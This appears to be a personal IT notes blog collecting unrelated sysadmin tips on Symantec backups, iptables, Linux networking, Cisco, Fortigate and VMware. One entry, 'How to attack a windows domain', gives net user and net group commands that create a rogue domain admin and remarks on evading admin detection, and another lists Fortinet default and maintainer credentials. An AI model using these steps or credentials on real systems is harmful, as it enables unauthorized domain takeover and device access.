What are the different file types created with Symantec System Recovery 2011?

Problem

After completing backups, need to understand files related to Incremental and Full backups.

Solution

.v2i  - Base or Full Backup recovery point image. This can be created from a baseline or Independent Backup.

 

.iv2i - Incremental image. An incremental includes changes since the last incremental was performed or since the BASE.

 

.sv2i - System Restore File.   Each time a backup image is created, a system index file is saved along with it.

 

The system index file (.sv2i) is created when a backup operation is performed that has multiple drives or a recovery point set (base and incremental backups). A system index file reduces the amount of time that is needed to restore the drives. When a recovery point is created, a system index file is saved with it. The system index file contains a list of the most recent recovery points, which includes the original drive location of each recovery point.

 

.fbf - File Folder Backups. 

 

Recovery Point Set definition: A recovery point set is defined as the Base + all incrementals associated with that Base.

 

• For example:  if you create a Base backup on the first of each month and incrementals once per week, you will have 5 backup images (one base and 4 incrementals) at the end of the month. All 5 of these images comprise one recovery point set.

 

·         Recovery Point Set Example:

C_Drive001.v2i (Base backup for recovery point set #1)

C_Drive001_i001.iv2i (incremental backup #1 for recovery point set #1)

C_Drive001_i002.iv2i (Incremental backup #2 for recovery point set #1)

C_Drive002.v2i (Base backup for recovery point set #2)

C_Drive002_i001.iv2i (Incremental backup #1 for recovery point set #2)

 

By default, scheduled independent recovery point file names and recovery point

set file names are appended with 001.v2i, 002.v2i, and so forth.

 

Incremental recovery point file names within a set are appended with _i001.iv2i, _i002.iv2i,

and so forth. For example, if your base recovery point is called Server001.v2i,

the first incremental recovery point is called Server 001_i001.iv2i.

 

refer: http://www.symantec.com/business/support/index?page=content&id=TECH159186

Add, delete the rule in Chain INPUT (policy ACCEPT)

Add the rule in Chain INPUT (policy ACCEPT)
sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT
sudo iptables -A INPUT -p tcp --dport http -j ACCEPT
sudo iptables -A INPUT -p tcp --dport ftp -j ACCEPT
sudo iptables -A INPUT -p tcp --dport http -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65020 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65030 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65020:65030 -j ACCEPT

Delete the rule
iptables -D INPUT -p tcp --dport 65020 -j ACCEPT
iptables -D INPUT -p tcp --dport 65030 -j ACCEPT


iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
This is the rule that does most of the work, and again we are adding (-A) it to the INPUT chain. Here we're using the -m switch to load a module (state). The state module is able to examine the state of a packet and determine if it is NEW, ESTABLISHED or RELATED. NEW refers to incoming packets that are new incoming connections that weren't initiated by the host system. ESTABLISHED and RELATED refers to incoming packets that are part of an already established connection or related to and already established connection.

ref: http://wiki.centos.org/HowTos/Network/IPTables

Add a static IP to a Redhat/Fedora/CentOS box

To edit/create first NIC file, type command:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0

Append/modify as follows:

DEVICE=eth0
BOOTPROTO=static
DHCPCLASS=
HWADDR=00:30:48:56:A6:2E
IPADDR=10.10.29.66
NETMASK=255.255.255.192
ONBOOT=yes

Add / setup a new route
# route add default gw 192.168.1.254 eth0

Setup DNS Server as follows:
# vi /etc/resolv.conf

nameserver 10.0.80.11
nameserver 10.0.80.12
nameserver 202.67.222.222

ref: 
Linux change ip address
http://www.cyberciti.biz/faq/linux-change-ip-address/

Howto Red hat enterprise Linux 5 configure the network card
http://www.cyberciti.biz/faq/rhel-centos-fedoracore-linux-network-card-configuration/

Linux setup default gateway with route command
http://www.cyberciti.biz/faq/linux-setup-default-gateway-with-route-command/

Command for check SELinux status

cat /etc/sysconfig/selinux

Fully Disabling SELinux

1. vi /etc/selinux/config
2. change the SELINUX line to SELINUX=disabled
3. when done editing click “ESC”
4. type “:” and you will get option to type command.
5. type “w” and press enter to save
6. type “:” to get option to type command and then type “q” and press enter to exit

VMware Virtual Machine Hardware Versions

This table lists VMware products and their virtual hardware version:

Virtual Hardware Version	Products
9	ESXi 5.1 Fusion 5.x Workstation 9.x Player 5.x
8	ESXi 5.x Fusion 4.x Workstation 8.x Player 4.x
7	ESXi/ESX 4.x Fusion 3.x Fusion 2.x Workstation 7.x Workstation 6.5.x Player 3.x Server 2.x
6	Workstation 6.0.x
4	ACE 2.x ESX 3.x Fusion 1.x Player 2.x
3 and 4	ACE 1.x Lab Manager 2.x Player 1.x Server 1.x Workstation 5.x Workstation 4.x
3	ESX 2.x GSX Server 3.x

refer: http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1003746

Separating First and Last Names Using Formulas

The example is shown, how to using RIGHT, LEFT, FIND, to separating First and Last Names.

Linux: Iptables Allow MYSQL server incoming request on port 3306

Open port 3306

In most cases following simple rule opens TCP port 3306:
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3306 -j ACCEPT

Reference: http://www.cyberciti.biz/tips/linux-iptables-18-allow-mysql-server-incoming-request.html

VMware - Failed to Lock the File - Cannot Open The disk VMDLK or one of the snapshot disks it depends on

Resolution: To solve this issue I opened the folder that has my virtual machine files . I found couple of folders that are named as ***.lck. I select them all and deleted them. You can also try to rename them if not comfortable with deleting them.

ref: http://blog.laksha.net/2009/10/vmware-failed-to-lock-file-cannot-open.html

Five reasons printer redirection causes Windows printing problems in RDS

Five reasons printer redirection causes Windows printing problems in RDS

Problem creating vdisk

http://forums.citrix.com/thread.jspa?threadID=308359&tstart=7

Network Policy Server Log Location

In general,  the log location of Microsoft Network Policy Server at,

C:\Windows\System32\LogFiles\INXXXXXX.log

CFG_CMDBAPI_ERR

The problem for causing "CFG_CMDBAPI_ERR" may be related to conserve mode. Conserve mode would be triggered when the unit is having high memory usage.

Technical Note : Discussion of regular conserve mode and kernel conserve mode

Active Directory : You do not have sufficient privileges to delete Organizational Unit

Step 1:
Click on : View > Advanced Features

Step 2:
Right click on the OU you want to remove and then Properties ;
Click on Object tab ;
Uncheck the box Protect object from accidental deletion.

Configure Cisco switch telnet login and password

1.) Connect console cable
2.) Use terminal emulation program to connect to switch or router. The default settings should be: Bits Per Second: 9600, Data Bits: 8, Parity: None, Stop Bits: 1, Flow Control: None. Connect
3.) Enter Privileged Exec mode via typing enable. The prompt with “>” dictates that it is “user” mode. Exec mode is “#”.
4.) Enter configure terminal mode by typing that in after enable (while in exec/privileged mode)or config t for short.
5.) Type in line vty 0 15 (meaning virtual telnet 0 – 15, 16 in all. You can set different passwords for different vtys. It is not limited to ONLY 0 15. Meaning ONLY 0-15.)
6.) Type “password *password*”, where the asterisks dictate what you want to set your password as.

DHCP Snooping

DHCP snooping acts like a firewall between untrusted hosts and DHCP servers. You use DHCP snooping to differentiate between untrusted interfaces connected to the end user and trusted interfaces connected to the DHCP server or another switch. When a switch receives a packet on an untrusted interface and the interface belongs to a VLAN that has DHCP snooping enabled, the switch compares the source MAC address and the DHCP client hardware address. If the addresses match (the default), the switch forwards the packet. If the addresses do not match, the switch drops the packet. The switch drops a DHCP packet when one of these situations occurs:

·         A packet from a DHCP server, such as a DHCPOFFER, DHCPACK, DHCPNAK, or DHCPLEASEQUERY packet, is received from outside the network or firewall.

·         A packet is received on an untrusted interface, and the source MAC address and the DHCP client hardware address do not match.

·         The switch receives a DHCPRELEASE or DHCPDECLINE broadcast message that has a MAC address in the DHCP snooping binding database, but the interface information in the binding database does not match the interface on which the message was received.

·         A DHCP relay agent forwards a DHCP packet, which includes a relay-agent IP address that is not 0.0.0.0, or the relay agent forwards a packet that includes option-82 information to an untrusted port.

Refer to DHCP Snooping Configuration Guidelines for the guidelines on how to configure DHCP snooping.

Note: For DHCP snooping to function properly, all DHCP servers must be connected to the switch through trusted interfaces.

Note: In a switch stack with Catalyst 3750 Switches, DHCP snooping is managed on the stack master. When a new switch joins the stack, the switch receives DHCP snooping configuration from the stack master. When a member leaves the stack, all DHCP snooping bindings associated with the switch age out.

Note: In order to ensure that the lease time in the database is accurate, Cisco recommends that you enable and configure NTP. If NTP is configured, the switch writes binding changes to the binding file only when the switch system clock is synchronized with NTP.
Rogue DHCP servers can be mitigated by DHCP snooping features. The ip dhcp snooping command is issued in order to enable DHCP globally on the switch. When configured with DHCP snooping, all ports in the VLAN are untrusted for DHCP replies. Here, only the FastEthernet interface 1/0/3 connected to the DHCP server is configured as trusted.

DHCP Snooping

Cat3750#conf t Enter configuration commands, one per line.  End with CNTL/Z. Cat3750(config)#ip dhcp snooping     !--- Enables DHCP snooping on the switch. Cat3750(config)#ip dhcp snooping vlan 1     !--- DHCP snooping is not active until DHCP snooping is enabled on a VLAN.   Cat3750(config)#no ip dhcp snooping information option   !--- Disable the insertion and removal of the option-82 field, if the  !--- DHCP clients and the DHCP server reside on the same IP network or subnet.   Cat3750(config)#interface fastEthernet 1/0/3 Cat3750(config-if)#ip dhcp snooping trust   !--- Configures the interface connected to the DHCP server as trusted.   Cat3750#show ip dhcp snooping Switch DHCP snooping is enabled DHCP snooping is configured on following VLANs: 1 Insertion of option 82 is disabled Option 82 on untrusted port is not allowed Verification of hwaddr field is enabled Interface                    Trusted     Rate limit (pps) ------------------------     -------     ---------------- FastEthernet1/0/3            yes         unlimited   !--- Displays the DHCP snooping configuration for the switch.   Cat3750#show ip dhcp snooping binding MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface ------------------  ---------------  ----------  -------------  ----  -------------------- 00:11:85:A5:7B:F5     10.0.0.2        86391       dhcp-snooping  1    FastEtheret1/0/1 00:11:85:8D:9A:F9     10.0.0.3        86313       dhcp-snooping  1    FastEtheret1/0/2 Total number of bindings: 2   !--- Displays the DHCP snooping binding entries for the switch.   Cat3750#   !--- DHCP server(s) connected to the untrusted port will not be able !--- to assign IP addresses to the clients.

Refer to Configuring DHCP Features for more information.

Fortinet Deflaut Account

User Name	Password	Description
admin	(none)
		- Admin access (Telnet)
maintainer	bcpb+serial#
		- serial# has to be in caps - Admin access (Console)
maintainer	admin
		- Admin access (Console)

ref: http://www.default-password.info/fortinet/

Fortigate Command - Setting back to factory defaults using the console cable

Connect with a terminal program (like hyperterminal or putty)
connect with these settings:
8 bits
no parity
1 stop bit
9600 baud (the FortiGate-300 uses 115,000 baud)
Flow Control = None

log in as admin (perhaps with no password - perhaps with a password you set)

run this from the CLI:
exec factoryreset

ref: http://t-solve.blogspot.hk/2010/06/setting-fortigate-back-to-factory.html

Symantec Communications Brief - Symantec Customers Experiencing Blue Screen Issues

Dear Customers,

On 11 July night, we found a defect on SEP 12.1 VD, which might cause some Win XP machines Blue Screen Of Death issue.

                Below is the whole story and how to avoid the issue and what’s the work around for your reference.

Problem

On July 11th, 2012 at approximately 22.30 PST, Symantec starting receiving reports of customers experiencing blue screens after applying Antivirus Definitions July 11th revision 18 and Proactive Threat Protection Definitions July 11th rev 11. Machines may continue to blue screen after they reboot. This problem only appears to occur on Windows XP machines running SEP 12.1.

Error

Blue screen (BSOD) with code 0x000000CB after installing the definitions from 11/07/2012 rev. 11 or rev. 18

Environment

SEP 12.1 Systems on Windows XP 32 bit and 64 bit

Cause

Symantec has reproduced the problem and is now trying to identify the root cause. We have posted updated signatures which resolve the issue to the public LiveUpdate production servers.

Solution

Symantec has posted updated signatures which resolve the issue to the public LiveUpdate production servers. To work around the issue please follow these steps on the impacted machines.

For Enterprise customers, make sure you have updated to the latest virus definitions on the Symantec Endpoint Protection Manager(SEPM)

1. Open the Symantec Endpoint Protection Manager

2. Login

3. Select "Admin"

4. Select "Local site"

5. Select "Download LiveUpdate content"

On affected client machines running Symantec Endpoint Protection 12.1

1. Start computer in safe mode

2. Navigate to the Symantec Endpoint Protection definition directory: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Definitions\BASHDefs

3. Delete the latest content directory (should be 20120711.011)

4. Reboot

Note: If the client is pulling down content from LiveUpdate or LiveUpdate Administrator, please run LiveUpdate. If the client is pulling down content from the SEPM, the content will be automatically downloaded without any interaction. Until the content is delivered, the client UI may show with a warning due to missing content.

When the system has been updated properly in the client user interface for Proactive Threat Protection the definition versions will be Wednesday, July 11, 2012 r12

Article URL   http://www.symantec.com/docs/TECH192811

Thanks & Regards,

Linda

How to attack a windows domain

Code:

C:\net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.
 
The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Code:

C:\net group “domain admins” hacked /add /domain
net group “domain admins” hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com
 
The command completed successfully.

ref: http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/

Windows 7 Does Not Detect My DVD ROM Drive

To do this, follow these steps:

1. Open Registry for editing (Regedit.exe).
2. Locate, and then click the following registry sub key:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}
   Caution 
   To make sure that you are in the appropriate registry sub key, make sure that the Default data value is DVD/CD-ROM and the Class data value is CDROM. 
   
   
3. In the right pane, right-click UpperFilters, and then click Delete.
4. Click Yes to confirm the removal of the UpperFilters registry entry.
5. Do the same to the LowerFilters
6. Exit Registry Editor, and then restart the computer.

That it, The CD/DVD should now be working as expected.

Source: http://support.microsoft.com/default.aspx/kb/929461/en-us

ref: http://answers.microsoft.com/en-us/windows/forum/windows_7-hardware/my-computer-cannot-detect-my-dvd-drive-in-windows/3e232ab4-1a4c-425d-96dc-4f4dac074c60

Veeam Backup Free Edition for VMware and Hyper-V

http://www.veeam.com/virtual-machine-backup-solution-free.html?ad=menu.

Backup of Sticky Notes (自黏便箋)

The path of Sticky Notes (自黏便箋)

C:\Users\username\AppData\Roaming\Microsoft\Sticky Notes

VMware vSphere ESX/ESXi and Microsoft Hyper-V Backup and Recovery Solution

http://www.trilead.com/Features/

Windows 7 Service Pack 1 (SP1) 的遠端伺服器管理工具

To install the Administration Tools pack by using the Windows interface

1. Download the Administration Tools package from the Microsoft Web site (http://go.microsoft.com/fwlink/?LinkID=137379).
   
2. Open the folder into which the package downloaded, double-click the package to unpack the files, and then start the Remote Server Administration Tools Setup Wizard.
   

   	Note
   	You must accept the License Terms and Limited Warranty to install Administration Tools.

3. Complete all the steps that are required by the wizard, and then click Finish to exit the wizard when installation is completed.
   
4. Click Start, click Control Panel, and then click Programs.
   
5. In the Programs and Features area, click Turn Windows features on or off.
   If you are prompted by User Account Control to allow the Windows Features dialog box to open, click Continue.
   
6. In the Windows Features dialog box, expand Remote Server Administration Tools.
   
7. Select the remote management tools that you want to install, and then click OK.
   
8. Configure the Start menu to display the Administration Tools shortcut, if it is not already there.
   
   1. Right-click Start, and then click Properties.
      
   2. On the Start Menu tab, click Customize.
      
   3. In the Customize Start Menu dialog box, scroll down to System Administrative Tools, and then select Display on the All Programs menu and the Start menu. Click OK.
      Shortcuts for snap-ins installed by Remote Server Administration Tools for Windows 7 are added to the Administrative Tools list on the Start menu.

http://www.microsoft.com/zh-tw/download/details.aspx?id=7887

Windows 7 language packs

How to install a Windows 7 language pack and How to change the interface of Windows 7 after a language pack is installed

ref: http://support.microsoft.com/kb/972813

Crypto Exception: error:02001005

Problem: general system error occurred: Crypto Exception: error:02001005:system library:fopen:Input/output error:unable to load C:\ProgramData\VMware\VMware vCenter Converter Standalone\ssl\rui.crt

Solution:
 Go to "C:\ProgramData\VMware\VMware vCenter Converter Standalone\" and Grant the rights for "SSL" folder


ref: http://communities.vmware.com/message/1870752

Forigate - Set Allowaccess

The command for  "Set Allowaccess"

config system interface
edit port8
set ip 10.11.101.102/24
set allowaccess https ping ssh snmp
end

Forigate Console

To connect to the CLI using a local serial console connection

1 Using the null modem or RJ-45-to-DB-9 cable, connect the FortiGate unit’s console
port to the serial communications (COM) port on your management computer.

2 On your management computer, start HyperTerminal.

3 For the Connection Description, enter a Name for the connection, and select OK.

4 On the Connect using drop-down list box, select the communications (COM) port on
your management computer you are using to connect to the FortiGate unit.

5 Select OK.

6 Select the following Port settings and select OK.

Bits per second: 9600
Data bits:8
Parity: None
Stop bits: 1
Flow control: None

7 Press Enter or Return on your keyboard to connect to the CLI.

8 Type a valid administrator account name (such as admin) and press Enter.

9 Type the password for that administrator account and press Enter. (In its default state,
there is no password for the admin account.)
The CLI displays the following text:

Welcome!
Type ? to list available commands.
You can now enter CLI commands, including configuring

Error E0BB014B: Volume not found

Restoring Dynamic Disks in the Backup Exec System Recovery (BESR) and Symantec System Recovery (SSR) Symantec Recovery Environment (SRD).

Problem

Restoring Dynamic Disks in the Backup Exec System Recovery (BESR) and Symantec System Recovery (SSR) Symantec Recovery Environment (SRD).

Error

When a non-system disk is restored, Disk Management in Windows can be used to convert the disk to dynamic. In some cases, it might be necessary to restore and preserve a Microsoft Dynamic Disk Volume from within the SRD using the Microsoft tool DISKPART.

Solution

The below process is written for non-system disks. If you are restoring an operating system volume, the option to make the partition bootable may be grayed out during in the SRD restore wizard. If this is the case, that partition should be restored (it will restore as a simple volume), booted into Windows, and Windows Disk Management used to convert the volume back to dynamic.

CAUTION: Be aware that the following steps DELETES the entire disk/drive/array of all volumes and data.

1. Boot the system using the Symantec Recovery Disk (SRD) CD. 
2. From the main menu select Analyze then Open Command Shell.
3. In the command prompt type Diskpart and press Enter.
4. Type List Disk and press Enter to list the available disks on this system.
5. Note the disk number of the volume to create dynamic disks upon. 
WARNING: If removable disks are present, to prevent possible data lost disconnect such drives. After disconnecting them type rescan and press enter. Return to step 4.

6. Type Sel Disk # and press Enter; where # is the number of the disk from step 5.

WARNING: If you are sure the correct disk is selected then proceed to next step , the next step will wipe all info on selected disk

7. Type Clean and press Enter; a message indicating the disk was successfully cleaned should appear.
8. Type create partition primary and press Enter; a message indicating the primary partition was created should appear.
9. Type convert dynamic and press Enter; a message indicating that the conversion was successful appears.
10. Start the recovery wizard, restore the recovery point to the "unknown" volume; dynamic disks appear as "unknown" within SRD. 
11. Reboot out of the SRD.
12. In Windows choose Right click on My computer choose Manage from the context menu.
13. Click Disk Management then right click on the foreign Disk; the disk to which the recovery point was just restored.
14. Select import Foreign Disks | Assign and choose the appropriate drive letter.

 

ref: http://www.symantec.com/business/support/index?page=content&id=TECH69331

Free File Encryption Software

http://www.file-encryption.net/

SAS vs. SATA Differences, Technology and Cost

Here are the high-level differences between SAS and SATA disk drives:

Capacity:

• SATA disk drives are the largest on the market.  The largest SATA drives available with widespread distribution today are 1.5TB-2TB.
• SAS disk drives are typically smaller than SATA.  The largest SAS drives available with widespread distribution today are 450GB.
• So, for capacity, a SATA disk drive is 3X-4x as dense for capacity than SAS.
• A good way to quantify capacity comparison is $/GB.  SATA will have best $/GB.

Performance:

• SATA disk drives spin at 7.2k RPMs.  Average seek time on SATA is 9.5msec.  Raw Disk IOPS (IOs per second) are 106.
• SAS disk drives spin at 15k RPMs.  Average seek time on SATA is 3.5msec.  Raw Disk IOPS (IOs per second) are 294.
• So, for performance, a SAS hard drive is nearly 3X as fast as SATA.
• A good way to quantify performance comparison is $/IOP.  SAS will have best $/IOP.

Reliability: there are two reliability measures – MTBF and BER.

• MTBF is mean time between failures.  MTBF is a statistical measure of drive reliability.
• BER is Bit Error Rate.  BER is a measure of read error rates for disk drives.
• SATA drives have a MTBF of 1.2 million hours.  SAS drives have a MTBF of 1.6 million hours.  SAS drives are more reliable than SATA when looking at MTBF.
• SATA drives have a BER of 1 read error in 10^15 bits read.  SAS drives have a BER of 1 read error in 10^16 bits read.  SAS drives are 10x more reliable for read errors.  Keep in mind a read error is data loss without other mechanisms (RAID or Network RAID) in place to recover the data.

ref: http://blog.lewan.com/2009/09/14/sas-vs-sata-differences-technology-and-cost/